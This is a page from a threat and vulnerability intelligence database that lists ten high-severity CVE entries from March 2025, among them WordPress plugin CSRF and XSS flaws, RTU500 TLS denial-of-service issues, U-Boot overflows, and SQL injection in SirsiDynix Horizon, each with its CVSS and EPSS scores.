CyberAlerts is shutting down on June 30th, 2025. Thank you for your support!
Threat and Vulnerability Intelligence Database
Example Searches:
CVE
Threat Actors
Countries
Vendors
Severity
Known Exploited
CVE-2024-3474 |
Description: The Wow Skype Buttons WordPress plugin before 4.0.4 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting buttons via CSRF attacks
CVSS: HIGH (8.8) EPSS Score: 0.03% SSVC Exploitation: none
March 25th, 2025 (3 months ago)
|
|
CVE-2025-1445 |
Description: A vulnerability exists in RTU IEC 61850 client and server functionality that could impact the availability if renegotiation of an open IEC61850 TLS connection takes place in specific timing situations, when IEC61850 communication is active.
Precondition is that IEC61850 as client or server are configured using TLS on RTU500 device. It affects the CMU the IEC61850 stack is configured on.
CVSS: HIGH (8.7) EPSS Score: 0.05%
March 25th, 2025 (3 months ago)
|
|
CVE-2024-12169 |
Description: A vulnerability exists in RTU500 IEC 60870-5-104 controlled station functionality and IEC 61850 functionality, that allows an attacker performing a specific attack sequence to restart the affected CMU. This vulnerability only applies, if secure communication using IEC 62351-3 (TLS) is enabled.
CVSS: HIGH (8.7) EPSS Score: 0.04%
March 25th, 2025 (3 months ago)
|
|
CVE-2024-57256 |
Description:
Nessus Plugin ID 233310 with High Severity
Synopsis
The remote SUSE host is missing one or more security updates.
Description
The remote SUSE Linux SLED15 / SLED_SAP15 / SLES15 / SLES_SAP15 / openSUSE 15 host has packages installed that are affected by multiple vulnerabilities as referenced in the SUSE-SU-2025:0989-1 advisory. - CVE-2024-57256: integer overflow in U-Boot's ext4 symlink resolution function (bsc#1237284). - CVE-2024-57258: multiple integer overflows in U-Boot's memory allocator (bsc#1237287).Tenable has extracted the preceding description block directly from the SUSE security advisory.Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.
Solution
Update the affected packages.
Read more at https://www.tenable.com/plugins/nessus/233310
CVSS: HIGH (7.1)
March 25th, 2025 (3 months ago)
|
|
CVE-2024-53679 |
Description: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache VCL in the User Lookup form. A user with sufficient rights to be able to view this part of the site can craft a URL or be tricked in to clicking a URL that will give a specified user elevated rights.
This issue affects all versions of Apache VCL through 2.5.1.
Users are recommended to upgrade to version 2.5.2, which fixes the issue.
CVSS: HIGH (8.4) EPSS Score: 0.05%
March 25th, 2025 (3 months ago)
|
|
CVE-2025-2319 |
Description: The EZ SQL Reports Shortcode Widget and DB Backup plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions 4.11.13 to 5.25.08. This is due to missing or incorrect nonce validation on the 'ELISQLREPORTS_menu' function. This makes it possible for unauthenticated attackers to execute code on the server via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Version 5.25.10 adds a nonce check, which makes this vulnerability exploitable by admins only.
CVSS: HIGH (8.8) EPSS Score: 0.04%
March 25th, 2025 (3 months ago)
|
|
CVE-2024-13690 |
Description: The WP Church Donation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several donation form submission parameters in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
CVSS: HIGH (7.2) EPSS Score: 0.13%
March 25th, 2025 (3 months ago)
|
|
CVE-2024-44903 |
Description: SQL Injection can occur in the SirsiDynix Horizon Information Portal (IPAC20) through 3.25_9382; however, a patch is available from the vendor. This is in ipac.jsp in a SELECT WHERE statement, in a part of the uri= variable in the second part of the full= inner variable.
CVSS: HIGH (7.5) EPSS Score: 0.05%
March 25th, 2025 (3 months ago)
|
|
CVE-2024-10210 |
Description: An External Control of File Name or Path vulnerability in the APROL Web Portal used in B&R APROL <4.4-005P may allow an authenticated network-based attacker to access data from the file system.
CVSS: HIGH (8.4) EPSS Score: 0.05%
March 25th, 2025 (3 months ago)
|
|
CVE-2024-8313 |
Description: An Exposure of Sensitive System Information to an Unauthorized Control Sphere and Initialization of a Resource with an Insecure Default vulnerability in the SNMP component of B&R APROL <4.4-00P5 may allow an unauthenticated adjacent-based attacker to read and alter configuration using SNMP.
CVSS: HIGH (8.7) EPSS Score: 0.02%
March 25th, 2025 (3 months ago)
|